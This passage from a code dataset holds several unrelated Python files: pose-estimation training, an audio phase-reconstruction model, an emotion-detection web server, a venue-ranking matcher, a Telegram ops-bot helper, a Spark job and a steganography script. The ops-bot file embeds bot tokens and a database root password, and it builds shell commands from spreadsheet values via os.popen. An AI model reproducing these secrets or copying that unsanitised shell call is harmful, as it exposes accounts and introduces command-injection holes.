[x, y, z])\n if label:\n o_0 = cv2.putText(o_0, 'Prediction', (0, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0))\n if comparison_coordinates is not None:\n o_O = cv2.applyColorMap(sample_image, cv2.COLORMAP_BONE)\n o_O = vic.image_with_skeleton(o_O, comparison_coordinates)\n if label:\n o_O = cv2.putText(o_O, 'Ground Truth', (0, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0))\n final_image = np.hstack((o_O, o_0))\n else:\n final_image = o_0\n\n new_filename = sample_filename.split('/')[-2] + '_' + sample_filename.split('/')[-1]\n\n comparison_filename = os.path.join(run_dir, '{}'.format(new_filename))\n cv2.imwrite(comparison_filename, final_image)\n print('Saving sample to {}'.format(comparison_filename))\n\n\ndef display_flags():\n dict = tf.flags.FLAGS.flag_values_dict()\n print('Training Parameters: ')\n for k in dict:\n print('\\t{} \\t= \\t{}'.format(k, dict[k]))\n\n\ndef display_coordinate_comparison(item_coordinates: list, x_: list, y_: list, z_: list):\n print('x: [', end='')\n for i in range(16):\n print('%.4f' % item_coordinates[0][i], end=' ')\n print(']')\n print('x_: [', end='')\n for i in range(16):\n print('%.4f' % x_[0][i], end=' ')\n print(']')\n print('y: [', end='')\n for i in range(16):\n print('%.4f' % item_coordinates[1][i], end=' ')\n print(']')\n print('y_: [', end='')\n for i in range(16):\n print('%.4f' % y_[0][i], end=' ')\n print(']')\n print('z: [', end='')\n for i in range(16):\n print('%.4f' % item_coordinates[2][i], end=' ')\n print(']')\n print('z_: [', end='')\n for i in range(16):\n print('%.4f' % z_[0][i], end=' ')\n print(']')\n\n\ndef main(_):\n MODEL_NAME = FLAGS.model_name\n MODEL_DIR = FLAGS.model_dir\n MODEL_PATH = os.path.join(MODEL_DIR, MODEL_NAME) + '.ckpt'\n if FLAGS.run_name == '':\n run_name = 'run_{}'.format(time.time().__int__())\n else:\n run_name = FLAGS.run_name\n RUN_DIR = os.path.join(FLAGS.train_dir, run_name)\n BATCH_SIZE = FLAGS.batch_size\n EPOCH_NUM = FLAGS.epoch_num\n LEARNING_RATE = FLAGS.learning_rate\n SAVE_STEP = FLAGS.save_step\n SAMPLE_STEP = FLAGS.sample_step\n DEBUG_MODE = FLAGS.debug_mode\n TEMP_STEP = FLAGS.temp_step\n VAL_RATIO = FLAGS.val_ratio\n\n display_flags()\n\n # Now let's train it!\n # with tf_debug.LocalCLIDebugWrapperSession(tf.Session()) as session:\n with tf.Session() as session:\n saver = tf.train.import_meta_graph(MODEL_PATH + '.meta')\n graph = tf.get_default_graph()\n\n train_writer = tf.summary.FileWriter(os.path.join(RUN_DIR, 'train/'), session.graph)\n val_writer = 
tf.summary.FileWriter(os.path.join(RUN_DIR, 'val/'), session.graph)\n\n image_input = graph.get_tensor_by_name('image_input:0')\n x_ground_truth = graph.get_tensor_by_name('x_ground_truth:0')\n y_ground_truth = graph.get_tensor_by_name('y_ground_truth:0')\n z_ground_truth = graph.get_tensor_by_name('z_ground_truth:0')\n x_prediction = graph.get_tensor_by_name('x_prediction:0')\n y_prediction = graph.get_tensor_by_name('y_prediction:0')\n z_prediction = graph.get_tensor_by_name('z_prediction:0')\n x_loss = graph.get_tensor_by_name('x_loss:0')\n y_loss = graph.get_tensor_by_name('y_loss:0')\n z_loss = graph.get_tensor_by_name('z_loss:0')\n loss = graph.get_tensor_by_name('loss:0')\n heatmaps = graph.get_tensor_by_name('heatmaps:0')\n global_step = tf.train.get_global_step()\n train = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE,\n name=\"Adam{}\".format(time.time().__int__())).minimize(loss,\n global_step=global_step)\n\n session.run(tf.global_variables_initializer())\n\n tf.summary.scalar('Loss', loss)\n tf.summary.scalar('x Loss', x_loss)\n tf.summary.scalar('y Loss', y_loss)\n tf.summary.scalar('z Loss', z_loss)\n merged = tf.summary.merge_all()\n\n try:\n try:\n saver.restore(session, MODEL_PATH)\n global_step_ = session.run(global_step)\n print('Model loaded. Starting training. Global step = {}'.format(global_step_))\n\n start_time = time.time()\n current_time = start_time\n\n for i in range(1, EPOCH_NUM + 1):\n iteration_num = 0\n for j in range(1, 51):\n\n dataset = tf.data.TFRecordDataset('../data/train{}.tfrecord'.format(j))\n # shuffle_dataset = dataset.shuffle(buffer_size=400000)\n shuffle_dataset = dataset\n new_dataset = shuffle_dataset.map(parse_function)\n # repeat_dataset = new_dataset.repeat()\n batch_dataset = new_dataset.batch(BATCH_SIZE)\n iterator = batch_dataset.make_one_shot_iterator()\n next_element = iterator.get_next()\n\n while True:\n try:\n example = session.run(next_element)\n except tf.errors.OutOfRangeError:\n print('TFRecord file # {} ended.'.format(j))\n break\n else:\n example_images, example_xs, example_ys, example_zs = data_aug.random_crop(\n example['image'], example['xs'], example['ys'], example['zs'], 0.8, 0.05, 0.95)\n example_images, example_xs, example_ys, example_zs = data_aug.adjust_depth(\n example_images, example_xs, example_ys, example_zs, 10)\n # skeleton = vic.image_with_skeleton(\n # cv2.applyColorMap(example_images[0], cv2.COLORMAP_BONE),\n # [example_xs[0], example_ys[0], example_zs[0]])\n # cv2.imshow('test', skeleton)\n # cv2.waitKey(1000)\n\n iteration_num += 1\n random_num = random.random()\n if random_num > VAL_RATIO:\n\n [_, loss_, x_loss_, y_loss_, z_loss_, merged_] = session.run(\n [train, loss, x_loss, y_loss, z_loss, merged],\n feed_dict={\n image_input: example_images,\n x_ground_truth: example_xs,\n y_ground_truth: example_ys,\n z_ground_truth: example_zs\n })\n train_writer.add_summary(merged_, iteration_num)\n\n temp_time = time.time()\n period = temp_time - current_time\n current_time = temp_time\n print(\n 'Epoch {}, TFR File {}, Iteration {}, Loss = (x) {} \\t+ (y) {} \\t+(z) {} = {}. 
Time spent = {}'.format(\n i, j, iteration_num, x_loss_, y_loss_, z_loss_, loss_, period))\n else:\n [loss_, x_loss_, y_loss_, z_loss_, merged_] = session.run(\n [loss, x_loss, y_loss, z_loss, merged],\n feed_dict={\n image_input: example_images,\n x_ground_truth: example_xs,\n y_ground_truth: example_ys,\n z_ground_truth: example_zs\n })\n val_writer.add_summary(merged_, iteration_num)\n\n temp_time = time.time()\n period = temp_time - current_time\n current_time = temp_time\n\n print('Validation: Loss = (x) {} \\t+ (y) {} \\t+(z) {} = {}. Time spent = {}'.format(\n x_loss_, y_loss_, z_loss_, loss_, period))\n\n if iteration_num % SAMPLE_STEP == 0:\n sample_num = int(random.random() * example_xs.shape[0])\n sample_filename = example['filename'][sample_num]\n sample_filename = sample_filename.decode()\n sample_image = example_images[sample_num]\n sample_xs = example_xs[sample_num]\n sample_ys = example_ys[sample_num]\n sample_zs = example_zs[sample_num]\n\n [heatmaps_, x_, y_, z_] = session.run(\n [heatmaps, x_prediction, y_prediction, z_prediction],\n feed_dict={\n image_input: [sample_image],\n x_ground_truth: [sample_xs],\n y_ground_truth: [sample_ys],\n z_ground_truth: [sample_zs]\n })\n\n current_time = time.time()\n if DEBUG_MODE:\n display_coordinate_comparison([sample_xs, sample_ys, sample_zs], x_, y_, z_)\n\n sample_image = np.reshape(sample_image, (192, 256))\n save_sample(sample_image, sample_filename, RUN_DIR, x_[0], y_[0], z_[0],\n [sample_xs, sample_ys, sample_zs])\n\n if iteration_num % SAVE_STEP == 0:\n save_model(saver, session, MODEL_PATH)\n\n except Exception as e:\n print('Exception caught.')\n print(e.__repr__())\n traceback.print_exc()\n finally:\n train_writer.close()\n val_writer.close()\n selection = input('Save model? (y/n)')\n if selection == 'y':\n print('Saving model to ', MODEL_PATH)\n saver.save(session, MODEL_PATH)\n except FileNotFoundError:\n print('Model not found. Please create a checkpoint file first.')\n\n\nif __name__ == '__main__':\n tf.app.run(main)\n","sub_path":"src/train_p2c.py","file_name":"train_p2c.py","file_ext":"py","file_size_in_byte":12601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"121683656","text":"from itertools import zip_longest\n\nimport torch\nimport torch.nn as nn\n\nfrom .istft import InverseSTFT\n\n\nclass ConvGLU(nn.Module):\n def __init__(self, in_ch, out_ch, kernel_size=(7, 7), padding=None, batchnorm=False):\n super().__init__()\n if not padding:\n padding = (kernel_size[0] // 2, kernel_size[1] // 2)\n self.conv = nn.Conv2d(in_ch, out_ch * 2, kernel_size, padding=padding)\n if batchnorm:\n self.conv = nn.Sequential(\n self.conv,\n nn.BatchNorm2d(out_ch * 2)\n )\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n x = self.conv(x)\n ch = x.shape[1]\n x = x[:, :ch//2, ...] 
* self.sigmoid(x[:, ch//2:, ...])\n return x\n\n\nclass DeGLI_DNN(nn.Module):\n def __init__(self):\n super().__init__()\n self.convglu_first = ConvGLU(6, 16, kernel_size=(11, 11), batchnorm=True)\n self.two_convglus = nn.Sequential(\n ConvGLU(16, 16, batchnorm=True),\n ConvGLU(16, 16)\n )\n self.convglu_last = ConvGLU(16, 16)\n self.conv = nn.Conv2d(16, 2, kernel_size=(7, 7), padding=(3, 3))\n\n def forward(self, x, mag_replaced, consistent):\n x = torch.cat([x, mag_replaced, consistent], dim=1)\n x = self.convglu_first(x)\n residual = x\n x = self.two_convglus(x)\n x += residual\n x = self.convglu_last(x)\n x = self.conv(x)\n return x\n\n\ndef replace_magnitude(x, mag):\n phase = torch.atan2(x[:, 1:], x[:, :1]) # imag, real\n return torch.cat([mag * torch.cos(phase), mag * torch.sin(phase)], dim=1)\n\n\nclass DeGLI(nn.Module):\n def __init__(self, n_fft: int, hop_length: int,\n depth=1, separate_dnns=True, out_all_block=False):\n super().__init__()\n self.n_fft = n_fft\n self.hop_length = hop_length\n self.depth = depth\n self.out_all_block = out_all_block\n\n self.window = nn.Parameter(torch.hann_window(n_fft), requires_grad=False)\n self.istft = InverseSTFT(n_fft, hop_length=self.hop_length, window=self.window.data)\n\n num_dnns = depth if separate_dnns else 1\n self.dnns = nn.ModuleList([DeGLI_DNN() for _ in range(num_dnns)])\n\n def stft(self, x):\n return torch.stft(x, n_fft=self.n_fft, hop_length=self.hop_length, window=self.window)\n\n def forward(self, x, mag, max_length=None, depth=0):\n if isinstance(max_length, torch.Tensor):\n max_length = max_length.item()\n if depth == 0:\n depth = self.depth\n\n in_blocks = [x]\n for i, dnn in zip_longest(range(depth), self.dnns, fillvalue=self.dnns[-1]):\n # B, 2, F, T\n mag_replaced = replace_magnitude(in_blocks[-1], mag)\n\n # B, F, T, 2\n waves = self.istft(mag_replaced.permute(0, 2, 3, 1), length=max_length)\n consistent = self.stft(waves)\n\n # B, 2, F, T\n consistent = consistent.permute(0, 3, 1, 2)\n residual = dnn(in_blocks[-1], mag_replaced, consistent)\n in_blocks.append(consistent - residual)\n\n out_blocks = in_blocks[1:] if self.out_all_block else in_blocks[-1:]\n out_blocks = torch.stack(out_blocks, dim=1)\n\n final_out = replace_magnitude(in_blocks[-1], mag)\n\n return out_blocks, final_out, residual\n","sub_path":"model/degli.py","file_name":"degli.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312744050","text":"from __future__ import unicode_literals\nfrom bottle import Bottle, request, response, BaseRequest\nimport cv2\nfrom fer import FER\nfrom urllib.request import urlopen\nimport numpy as np\nimport base64\n\nBaseRequest.MEMFILE_MAX = 1024 * 1024\n\napp = Bottle()\n\n\ndetector = FER(mtcnn=True)\n\n\ntemplate = \"\"\"\n\n Home\n \n

<h2>Upload a file</h2>\n    <form action=\"/upload\" method=\"post\" enctype=\"multipart/form-data\">\n        <input type=\"file\" name=\"file\" />\n        <input type=\"submit\" value=\"Upload\" />\n    </form>
\n \n\"\"\"\n\n\n@app.get('/')\ndef home():\n return template\n\n\n@app.post('/upload')\ndef upload():\n # A file-like object open for reading.\n req_file = request.files['file']\n file = req_file.file.read()\n image = cv2.imdecode(np.fromstring(file, np.uint8), cv2.IMREAD_COLOR)\n result = detector.detect_emotions(image)\n print(result)\n emotions = {'angry': 0, 'disgust': 0, 'fear': 0,\n 'happy': 0, 'sad': 0, 'surprise': 0, 'neutral': 0}\n if len(result) > 0:\n bounding_box = result[0][\"box\"]\n emotions = result[0][\"emotions\"]\n cv2.rectangle(\n image,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0] + bounding_box[2],\n bounding_box[1] + bounding_box[3]),\n (0, 155, 255),\n 2,\n )\n image = cv2.flip(image, 1)\n\n print(emotions)\n\n retval, buffer = cv2.imencode('.jpg', image)\n imgBase64 = base64.b64encode(buffer)\n return {\n \"img\": 'data:image/jpeg;base64, '+imgBase64.decode('utf-8'),\n \"emotions\": emotions\n }\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n # cam = cv2.VideoCapture(0)\n\n # cv2.namedWindow(\"test\")\n\n # img_counter = 0\n\n # while True:\n # ret, frame = cam.read()\n # if not ret:\n # print(\"failed to grab frame\")\n # break\n # result = detector.detect_emotions(frame)\n # if len(result) > 0:\n # bounding_box = result[0][\"box\"]\n # emotions = result[0][\"emotions\"]\n # cv2.rectangle(\n # frame,\n # (bounding_box[0], bounding_box[1]),\n # (bounding_box[0] + bounding_box[2],\n # bounding_box[1] + bounding_box[3]),\n # (0, 155, 255),\n # 2,\n # )\n # cv2.imshow(\"test\", frame)\n\n # k = cv2.waitKey(1)\n # if k % 256 == 27:\n # # ESC pressed\n # print(\"Escape hit, closing...\")\n # break\n # elif k % 256 == 32:\n # # SPACE pressed\n # img_name = \"opencv_frame_{}.png\".format(img_counter)\n # cv2.imwrite(img_name, frame)\n # print(\"{} written!\".format(img_name))\n # img_counter += 1\n\n # cam.release()\n\n # cv2.destroyAllWindows()\n","sub_path":"server/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"70602319","text":"import json\nimport re\nfrom fuzzywuzzy import fuzz\n\n\nclass RankingMatcher():\n\n def __init__(self, *args, **kwargs):\n self.rank_dict = {\"A*\": 0, \"A\": 0, \"B\": 0, \"C\": 0, \"other\": 0}\n self.fuzzy = 0\n\n def clearDict(self):\n self.rank_dict = {\"A*\": 0, \"A\": 0, \"B\": 0, \"C\": 0, \"other\": 0}\n\n def addRank(self, rank):\n if rank in self.rank_dict:\n self.rank_dict[rank] += 1\n else:\n self.rank_dict['other'] += 1\n\n def hasAcronym(self, title):\n x = re.search(\"\\(([^)]+)\\)\", title)\n if x != None:\n acronym = title[int(x.span()[0])+1:int(x.span()[1])-1]\n print(\"acronym:\", acronym)\n return(acronym)\n else:\n return None\n\n def searchAcronym(self, acronym):\n with open(\"venues.json\", \"r\") as venues:\n venue_list = json.load(venues)\n for venue in venue_list:\n if venue['acronym'] == acronym:\n self.addRank(venue['rank'])\n return venue['rank']\n\n def searchVenuesFuzzy(self, title):\n with open(\"venues.json\", \"r\") as venues:\n venue_list = json.load(venues)\n highest_match = None\n for venue in venue_list:\n if fuzz.ratio(venue['title'], title) > 65:\n highest_match = venue\n if not highest_match == None:\n print(highest_match)\n self.addRank(highest_match['rank'])\n return highest_match['rank']\n\n def searchJournalsFuzzy(self, title):\n with open(\"journals.json\", \"r\") as journals:\n journal_list = json.load(journals)\n highest_match = None\n for 
journal in journal_list:\n if fuzz.ratio(journal['title'], title) > 65:\n highest_match = journal\n if not highest_match == None:\n print(highest_match)\n self.addRank(highest_match['rank'])\n return highest_match['rank']\n\n def searchVenues(self, title):\n with open(\"venues.json\", \"r\") as venues:\n venue_list = json.load(venues)\n for venue in venue_list:\n if title == venue['title']:\n self.addRank(venue['rank'])\n return venue['rank']\n\n def searchJournals(self, title):\n with open(\"journals.json\", \"r\") as journals:\n journal_list = json.load(journals)\n for journal in journal_list:\n if title == journal['title']:\n self.addRank(journal['rank'])\n return journal['rank']\n\n# returns rank dict given title of venue\n def matchOne(self, title):\n match = None\n # acronym = self.hasAcronym(title)\n # if acronym != None:\n # match = self.searchAcronym(acronym)\n # if not match == None:\n # print(\"match acro\")\n # else:\n if \"journal\" in title:\n match = self.searchJournals(title)\n if not match == None:\n print(\"match journal\")\n else:\n match = self.searchVenues(title)\n if not match == None:\n print(\"match venue\")\n # if no match => fuzzy match\n if match == None:\n print(\"no match => fuzzy\")\n match = self.searchVenuesFuzzy(title)\n if not match == None:\n print(\"match fuzzy venue\")\n else:\n # match journal fuzzy vllt\n match = self.searchJournalsFuzzy(title)\n if not match == None:\n print(\"match fuzzy journal\")\n else:\n print(\"no match for real\")\n self.rank_dict['other'] += 1\n\n if not match == None:\n return match\n\n# loads titles via json\n def matchAllJson(self):\n with open(\"papers.json\", \"r\") as papers:\n paper_list = json.load(papers)\n i = 1\n for paper in paper_list:\n print(i, paper[\"title\"])\n self.matchOne(paper[\"venue\"])\n i += 1\n print(self.rank_dict)\n\n# loads titles via string array\n def matchAllString(self, title_list):\n i = 1\n for paper in title_list:\n print(i, paper)\n self.matchOne(paper)\n i += 1\n print(self.rank_dict)\n rank_dict = self.rank_dict\n self.clearDict()\n return rank_dict\n\n\nif __name__ == \"__main__\":\n matcher = RankingMatcher()\n # print(matcher.matchOne(\"Proc. 
ACM Symposium on Document Engineering(DocEng)\"))\n matcher.matchAllJson()\n pass\n","sub_path":"flask-bs/ranking_matcher.py","file_name":"ranking_matcher.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327821449","text":"# -*- coding: utf-8 -*-\n'''\ndata = {'prod': {'survey_url':'https://docs.google.com/spreadsheets/d/1jZ7XEhS0IYUI6mkf_YOQefgUiYTVZYRU-93my3cZJgs/edit#gid=0',\n 'table':'cs_detection.tasks',\n 'token':'1918831254:AAExIEvOAeEUzb6Xmx2GrTb6HfwwkBJD7p4'},\n 'test': {'survey_url':'https://docs.google.com/spreadsheets/d/10dvYLkKzAW_6mJFGR2LB7Mx0WY_c_8GLtqhqen0q3hY/edit#gid=1481259803',\n 'table':'cs_detection.tasks_test',\n 'token':'1877618805:AAE_M1K6GVgCyiNnm0GEgWoZ3NFVRsaza6g'},\n 'allow_list_dict':{'CS_Millie': '233459297',\n 'CS_Carol':'1461296420',\n 'CS_Edgar':'1076025437',\n 'CS_Sally':'1139058216',\n 'CS_Doris':'1853406042',\n 'RD':'1465290152',\n 'OM':'1798791836'},\n 'googlesheetAPIJson':'C://Users//user//Desktop//project//OMBOT//aicool-csbot-0539c368976e.json'}\nwith open('config.json', 'w') as fp:\n json.dump(data, fp)\n'''\nimport threading\nimport json\nimport pygsheets\nimport os\nimport pandas as pd\nfrom urllib.request import ssl, socket\nimport mysql.connector\nfrom telnetlib import Telnet\nimport time\nimport datetime\nfrom queue import Queue\npd.set_option('max_columns', None)\npd.set_option('max_rows', 100)\ndef variable_zone(env='test'):\n with open('config.json') as json_file: \n config = json.load(json_file) \n gc = pygsheets.authorize(service_account_file=config['googlesheetAPIJson'])\n survey_url = config[env]['survey_url']\n table = config[env]['table']\n token = config[env]['token']\n \n #allow list\n allow_list_dict = config['allow_list_dict']\n allow_list = list(allow_list_dict.values()) \n sh = gc.open_by_url(survey_url)\n ws = sh.worksheet_by_title('CS維護表')\n \n return ws, table, token, allow_list\n\ndef ws_to_df(ws):\n df = ws.get_as_df(start='A1', \n index_colum=0, \n empty_value='',\n include_tailing_empty=False) # index 從 1 開始算 \n df['商戶'] = df['商戶'].apply(lambda x: str(x).upper())\n df['type'] = df['type'].apply(lambda x: str(x).upper())\n df.columns = ['商戶', 'ip', 'domain', 'MYSQL', 'TOMCAT', 'SOCKET', 'type']\n return df\n\ndef om_bot(text, df):\n def execCmd(cmd, request, q):\n def get_check(tar, remove_list=['最小值=', '最大值=', '平均=', 'ms'], spli=',',threshold=200): \n try:\n rs = tar\n for i in remove_list:\n rs = rs.replace(i, '')\n rs = [float(i) for i in rs.split(spli) ]\n if max(rs) >=200:\n icon = '❌'\n else:\n icon = '✅'\n except:\n icon = '❌'\n return icon \n cmd_raw = cmd\n cmd_ta = cmd_raw.replace('(socket)', '')\n r = os.popen(cmd_ta)\n result = r.read()\n r.close()\n if request == 'PING':\n result = result.split('\\n')[-2].replace(' ', '')\n get_ip_icon = get_check(result)\n result = (cmd_raw, ' 結果:\\n'+ result+ get_ip_icon)\n \n elif request == 'TCPING':\n result = result.split('\\n')[-2].replace(' ', '')\n get_ip_icon = get_check(result, \n remove_list=['Minimum=', 'Maximum=', 'Average=', 'ms'], \n spli=',',\n threshold=200)\n result = (cmd_raw, ' 結果:\\n'+ result+ get_ip_icon)\n q.put(result)\n \n def multithread(dx):\n q = Queue()\n all_thread = []\n for i in range(len(dx)):\n thread = threading.Thread(target=execCmd, args=(dx.cmd[i], \n dx.req[i], \n q))\n thread.start()\n all_thread.append(thread)\n for t in all_thread:\n t.join()\n # 使用 q.get() 取出要傳回的值\n result = []\n for _ in range(len(all_thread)):\n 
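# q.get() returns one (cmd, result) tuple per finished worker thread\n            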
result.append(q.get())\n return result \n\n BadRequest_ans = 'request不在查詢範圍中 / 格式不對' \n seperation = '\\n-------------------------------' \n try:\n text = text.upper()\n customer, request = text.split(' ')\n ta = df[df['商戶'] == customer].reset_index(drop=True)\n if (ta.empty) & (request != 'LIST'):\n return_text = BadRequest_ans\n else:\n IP = [i for i in ta[ta.ip != '']['ip']]\n Domain = [i.replace('(socket)', '') for i in ta[ta.domain != '']['domain']]\n Domain_raw = [i for i in ta[ta.domain != '']['domain']]\n #ping\n if request in ['PING']: \n cmd_first = 'ping '\n cmds = IP.copy()\n cmds.extend(Domain_raw)\n cmds = [cmd_first+ i for i in cmds]\n dx = pd.DataFrame({'req': 'PING',\n 'cmd': cmds,\n 'sep':seperation})\n return_text_df = multithread(dx)\n return_text_df = pd.DataFrame(return_text_df, columns=['cmd', 'result'])\n dx = dx.merge(return_text_df, on='cmd', how='left')\n\n return_text = '\\n'.join([dx.cmd[i]+ dx.result[i]+ dx.sep[i] for i in range(len(dx))])\n\n elif request in ['LIST']:\n df2 = df.copy()\n df2 = df2[df['商戶'] != ''].reset_index(drop=True)\n if customer != 'ALL':\n condition = [True if customer in i else False for i in df2['商戶']]\n else:\n condition = [True for i in df2['商戶']] \n \n show = df2[condition]['商戶'].unique() \n return_text = '######List結果######\\n{show}'.format(show = str(list(show)))\n #tcping \n elif request in ['TCPING']:\n cmd_first = 'tcping '\n cmds = Domain_raw\n cmds = [cmd_first+ i+ ' 443' for i in cmds]\n cmds_final = []\n group, cnt = [], 0\n for x in cmds:\n if '(socket)' in x:\n cmds_final.extend([x, x.replace('443', '80'), x.replace('443', '9081')])\n group.extend([cnt] *3)\n else:\n cmds_final.extend([x, x.replace('443', '80')])\n group.extend([cnt] *2)\n cnt += 1\n dx = pd.DataFrame({'req': 'TCPING',\n 'cmd': cmds_final,\n 'group':group})\n return_text_df = multithread(dx)\n return_text_df = pd.DataFrame(return_text_df, columns=['cmd', 'result'])\n dx = dx.merge(return_text_df, on='cmd', how='left')\n dx.loc[:, 'idx'] = dx.index\n dx_g = list(dx.groupby(['group'])['idx'].idxmax())\n dx.loc[:, 'sep'] = ''\n for i in dx_g:\n dx.loc[i, 'sep'] = seperation\n return_text = '\\n'.join([dx.cmd[i]+ dx.result[i]+ dx.sep[i] for i in range(len(dx))])\n \n elif request == 'IP': \n return_text = '\\n'.join(IP) \n else:\n return_text = BadRequest_ans\n except:\n return_text = BadRequest_ans \n return return_text\n\n\ndef trans_text(raw):\n text = raw.upper()\n if text == 'LIST':\n text = 'ALL LIST'\n else:\n text = text \n c, r = text.split(' ')\n return text, c, r\n\n\ndef InsertLog(table, user, c, r, return_text):\n mydb = mysql.connector.connect(host=\"172.16.124.220\",\n user=\"root\",\n password=\"1q2w3e4r5t\",\n database=\"cs_detection\",\n charset='utf8')\n mycursor = mydb.cursor()\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.000')\n sql = \"INSERT INTO {table} (USER, createtime, cust, request, response) VALUES (%s, %s, %s, %s, %s)\".format(table=table)\n val = (user, now_time, c, r, return_text)\n mycursor.execute(sql, val)\n mydb.commit()\n mydb.close()\n mycursor.close()","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"185974838","text":"#dse spark-submit pyspark_inventory.py\n\n\nfrom pyspark.sql import Row, SQLContext\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql.functions import lit\n\n# simple python code to see a spark-submit\n\n\nconf = 
SparkConf().setAppName(\"Extract UIDs\")\n\nsc = SparkContext(conf=conf)\nsqlContext = SQLContext(sc)\n\n\ndef getData():\n items_sold_by_store_ = sqlContext.read.format(\"org.apache.spark.sql.cassandra\").options(table=\"items_sold_by_store\", keyspace=\"atwater\").load()\n items_sold_by_store_.registerTempTable(\"my_temp_sales\")\n items_sold_by_store = sqlContext.sql(\"select store_id, date, product_id, -quantity as quantity from my_temp_sales where date < '2018-08-17'\")\n items_sold_by_store.groupby(['store_id','product_id']).agg({'quantity': 'sum'}).withColumnRenamed(\"sum(quantity)\", \"quantity\").withColumn('date', lit('2018-08-16')).write.format(\"org.apache.spark.sql.cassandra\").options(table=\"store_inventory\", keyspace = \"atwater\").save(mode =\"append\")\n\n sc.stop()\n\n\nif __name__ == \"__main__\":\n getData()\n","sub_path":"pyspark_inventory.py","file_name":"pyspark_inventory.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305854891","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef encode(img_file: str, msg: str) -> None:\n if sys.getsizeof(msg) > 160: raise ValueError('Not support message')\n msg_list = ''.join(msg.split())\n\n (result, raw_msg) = ([], [])\n pointer = 300\n img = open(img_file, 'rb+')\n for word in msg_list: raw_msg += list(format(ord(word), 'b'))\n img.seek(pointer)\n img_bytes = list(img.read(len(raw_msg)))\n result += [img_bytes[_] - int(raw_msg[_]) for _ in range(0, len(img_bytes))]\n img.seek(pointer)\n for _ in result: img.write(chr(_).encode('ISO-8859-1'))\n img.flush()\n img.close()\n\nencode(input(\"Input filename: \"), input(\"Input your message: \"))\n","sub_path":"lab10.py","file_name":"lab10.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9241996","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mplc\nimport seaborn as sns \nimport argparse\n\nfrom datareader import DataReader as Data\nfrom myutils import msg\n\nparser = argparse.ArgumentParser(description=\"Plot of the group distributions for an item.\")\nparser.add_argument('item', help='number of item to plot')\nparser.add_argument('-g', help='group number to plot (all by default)', default=None, type=int)\nparser.add_argument('-a', help='plot all ratings together ignoring groups', action=\"store_true\")\nparser.add_argument('--heat', help='plot as 2D heatmap (defualt histogram)', action=\"store_true\")\n\ndef barplot_rating_dist(item, single=False, group=None, savefig=None):\n\n\twith msg(\"plotting rating distribution\"):\n\t\tratings = Data.get_ratings()[:,item]\n\t\tnyms = Data.get_nyms()\n\n\t\tplt.xlabel('rating')\n\t\tplt.ylabel('no. 
ratings')\n\t\tstep = 1\n\t\tbins = np.arange(step/2, 5 + 1.5*step, step)\n\t\thist = lambda d, **kwargs: plt.hist(d, bins=bins, rwidth=step*0.75, **kwargs)\n\t\tif group is not None: \n\t\t\tplt.title(f'Item {item}, group {group} rating distribution')\n\t\t\thist(ratings[nyms[group]].data)\n\t\telif single: \n\t\t\tplt.title(f'Item {item} rating distribution')\n\t\t\thist(ratings.data)\n\t\telse:\n\t\t\tplt.title(f'Item {item}, all groups rating distributions')\n\t\t\tfor nym_n, nym in enumerate(nyms):\n\t\t\t\thist(ratings[nym].data, histtype='step', linewidth=2 ,label=f'group {nym_n}')\n\t\t\tplt.legend()\n\t\tif savefig is None:\n\t\t\tplt.show()\n\t\telse:\n\t\t\twith msg(f'Saving figure to \"{savefig}\"'):\n\t\t\t\tplt.savefig(savefig, dpi=150)\n\t\t\tplt.clf()\n\ndef heatmap_rating_dist(item):\n\t# def plot_rating_dists_across_groups(ratings, item, groups, savefig=False):\n\twith msg(\"plotting rating distribution\"):\n\t\tratings = Data.get_ratings()[:,item]\n\t\tnyms = Data.get_nyms()\n\n\t\tdata = np.zeros((10, len(nyms)))\n\t\tfor nym_n, nym in enumerate(nyms):\n\t\t\tunique, count = np.unique(ratings[nym].data, return_counts=True)\n\t\t\tfor rating, count in dict(zip(unique, count)).items():\n\t\t\t\tdata[int(2*rating - 1), nym_n] = count\n\n\t\tax = sns.heatmap(data)\n\t\tax.set(\n\t\t\ttitle=\"Distribution of item #{} ratings by group\".format(int(item)),\n\t\t\txlabel=\"group number\", \n\t\t\tylabel=\"rating\", \n\t\t\tyticklabels=np.linspace(0.5, 5, 10))\n\t\t\n\t\tplt.show()\n\nif __name__ == \"__main__\":\n\targs = parser.parse_args()\n\tif (args.heat): heatmap_rating_dist(args.item)\n\telse: barplot_rating_dist(args.item, single=args.a, group=args.g)\n","sub_path":"plot_item_dist.py","file_name":"plot_item_dist.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"62638624","text":"# server.py\nimport time\nfrom threading import Thread\nimport threading \nimport os\nimport sys\nfrom time import sleep\n\nIP_ADDRES = '89.40.126.143'\n\n#-------------------------------------------------------------\n# PROGRESS BAR\n#-------------------------------------------------------------\n# Print iterations progress\ndef printProgress (iteration, total, prefix = '', suffix = '', decimals = 1, barLength = 100):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - 